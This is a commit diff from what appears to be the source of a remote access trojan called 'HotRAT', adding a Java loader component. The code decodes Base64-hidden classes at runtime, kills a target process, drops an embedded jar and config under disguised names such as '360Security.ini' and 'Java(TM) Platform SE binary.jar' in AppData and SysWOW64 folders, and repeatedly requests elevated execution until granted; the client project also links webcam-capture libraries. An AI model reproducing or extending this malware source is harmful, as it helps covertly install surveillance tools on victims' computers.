Last Update

HotRAT SRC)/Loader/out/production/Loader/META-INF/MANIFEST.MF

@@ -1,3 +1,3 @@
 Manifest-Version: 1.0
-Main-Class: Loader
+Main-Class: Main
 

HotRAT SRC)/Loader/src/LoadKernel32.java

@@ -0,0 +1,8 @@
+import com.sun.jna.Library;
+import com.sun.jna.Native;
+import com.sun.jna.platform.win32.WinDef;
+
+public interface LoadKernel32 extends Library {
+    LoadKernel32 instance = (LoadKernel32) Native.loadLibrary("Kernel32.dll", LoadKernel32.class);
+    int GetWindowsDirectoryW(char[] chars,int size);
+}

HotRAT SRC)/Loader/src/Loader1.java

@@ -0,0 +1,114 @@
+import com.sun.jna.WString;
+import com.sun.jna.platform.win32.*;
+
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+
+import static com.sun.jna.platform.win32.WinDef.MAX_PATH;
+
+public class Loader1 {
+    public static InputStream data = Loader1.class.getResourceAsStream("resources/Data.cfg");
+    public static InputStream jar = Loader1.class.getResourceAsStream("resources/me.wtf");
+
+    public static void run(String cmd) throws IOException {
+        if(!cmd.equals("first")) {
+            int PID = Integer.parseInt(cmd);
+            File file = new File(getPath1() + "\\javaw.jar");
+            File file1 = new File(getPath1() + "\\360Security.ini");
+            File file2 = new File(getWindowsPath() + "\\Java(TM) Platform SE binary.jar");
+            File file3 = new File(getWindowsPath1() + "\\WindowsConfig.ini");
+            WinNT.HANDLE handle = Kernel32.INSTANCE.OpenProcess(WinNT.PROCESS_ALL_ACCESS, false, PID);
+            if (Kernel32.INSTANCE.TerminateProcess(handle, 0)) {
+                file.delete();
+                file1.delete();
+                file2.delete();
+                file3.delete();
+                createConfig1();
+                createFile1(file);
+                createProcess1();
+            }
+        }else {
+            try {
+                File file = new File(getPath1() + "\\javaw.jar");
+                char[] chars = new char[MAX_PATH];
+                Class clazz = new MyClassLoader().loadClass("LoadKernel32");
+                Field field = clazz.getDeclaredField("instance");
+                Object obj = field.get(null);
+                Method method = clazz.getDeclaredMethod("GetWindowsDirectoryW",char[].class,int.class);
+                method.invoke(obj,chars,MAX_PATH);
+                LoadKernel32.instance.GetWindowsDirectoryW(chars, MAX_PATH);
+                File file1 = new File(new String(chars).trim() + "\\SysWOW64\\WindowsConfig\\WindowsConfig.ini");
+                if (!file1.exists()) {
+                    createConfig1();
+                    createFile1(file);
+                    createProcess1();
+                } else {
+                    System.exit(0);
+                }
+            }catch (Exception e) {
+            }
+        }
+    }
+    public static void createProcess1() {
+        WinDef.INT_PTR int_ptr = Shell32.INSTANCE.ShellExecute(null,"runas",System.getProperty("java.home") + "\\bin\\javaw.exe", "-jar " + getPath1() + "\\javaw.jar",null,1);
+        while (int_ptr.intValue() <= 32) {
+            int_ptr = Shell32.INSTANCE.ShellExecute(null,"runas",System.getProperty("java.home") + "\\bin\\javaw.exe", "-jar " + getPath1() + "\\javaw.jar",null,1);
+        }
+    }
+
+    public static void createFile1(File file) {
+        try {
+            file.createNewFile();
+            FileOutputStream fileOutputStream = new FileOutputStream(file);
+            byte[] bytes = new byte[1024];
+            int len = 0;
+            while ((len = jar.read(bytes))!=-1) {
+                fileOutputStream.write(bytes,0,len);
+            }
+        }catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+    public static String getWindowsPath() {
+        char[] chars = new char[MAX_PATH];
+        LoadKernel32.instance.GetWindowsDirectoryW(chars,MAX_PATH);
+        File file = new File(new String(chars).trim() + "\\SysWOW64\\WindowsSettings");
+        if(!file.exists()) {
+            file.mkdirs();
+        }
+        return file.getPath();
+    }
+    public static String getWindowsPath1() {
+        char[] chars = new char[MAX_PATH];
+        LoadKernel32.instance.GetWindowsDirectoryW(chars,MAX_PATH);
+        File file = new File(new String(chars).trim() + "\\SysWOW64\\WindowsConfig");
+        if(!file.exists()) {
+            file.mkdirs();
+        }
+        return file.getPath();
+    }
+    public static void createConfig1() {
+        try {
+            File file = new File(getPath1() + "\\360Security.ini");
+            FileOutputStream fileOutputStream = new FileOutputStream(file);
+            int len = 0;
+            byte[] bytes = new byte[256];
+            while ((len = data.read(bytes))!=-1) {
+                fileOutputStream.write(bytes,0,len);
+            }
+            fileOutputStream.close();
+        }catch (Exception e) {
+        }
+    }
+    public static String getPath1(){
+        File file = new File(System.getProperty("user.home") + "\\AppData\\SetUp");
+        if(!file.exists()) {
+            file.mkdirs();
+        }
+        return file.getPath();
+    }
+}

HotRAT SRC)/Loader/src/META-INF/MANIFEST.MF

@@ -1,3 +1,3 @@
 Manifest-Version: 1.0
-Main-Class: Loader
+Main-Class: Main
 

HotRAT SRC)/Loader/src/Main.java

@@ -0,0 +1,21 @@
+import com.sun.jna.platform.win32.Shell32;
+
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+
+public class Main {
+    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException {
+        Method method = null;
+        try {
+            Class clazz = new MyClassLoader().loadClass("Loader1");
+            method = clazz.getDeclaredMethod("run",String.class);
+            method.invoke(null,args[0]);
+        }catch (ArrayIndexOutOfBoundsException e) {
+            method.invoke(null,"first");
+        }catch (ClassNotFoundException e) {
+            e.printStackTrace();
+        } catch (NoSuchMethodException e) {
+            e.printStackTrace();
+        }
+    }
+}

HotRAT SRC)/Loader/src/MyClassLoader.java

@@ -0,0 +1,25 @@
+import java.io.InputStream;
+import java.util.Base64;
+
+public class MyClassLoader extends ClassLoader{
+    @Override
+    protected Class<?> findClass(String name) {
+        byte[] bytes = null;
+        InputStream inputStream = MyClassLoader.class.getResourceAsStream(name + ".class_");
+        try {
+            byte[] tempbytes = read(inputStream);
+            bytes = Base64.getDecoder().decode(tempbytes);
+        } catch (Exception e) {
+        }
+        return defineClass(name, bytes, 0, bytes.length);
+    }
+    private byte[] read(InputStream inputStream) {
+        byte[] bytes = null;
+        try {
+            bytes = new byte[inputStream.available()];
+            inputStream.read(bytes);
+        }catch (Exception e) {
+        }
+        return bytes;
+    }
+}

HotRAT SRC)/RemoteControl-Client/YuanKong.iml

@@ -11,7 +11,6 @@
     <orderEntry type="library" name="bridj-0.7.0" level="project" />
     <orderEntry type="library" name="webcam-capture-0.3.12" level="project" />
     <orderEntry type="library" name="slf4j-api-1.7.5" level="project" />
-    <orderEntry type="library" name="commons-io-2.11.0" level="project" />
     <orderEntry type="library" name="jna-5.12.1" level="project" />
     <orderEntry type="library" name="jna-platform-5.12.1" level="project" />
     <orderEntry type="library" name="KotlinJavaRuntime" level="project" />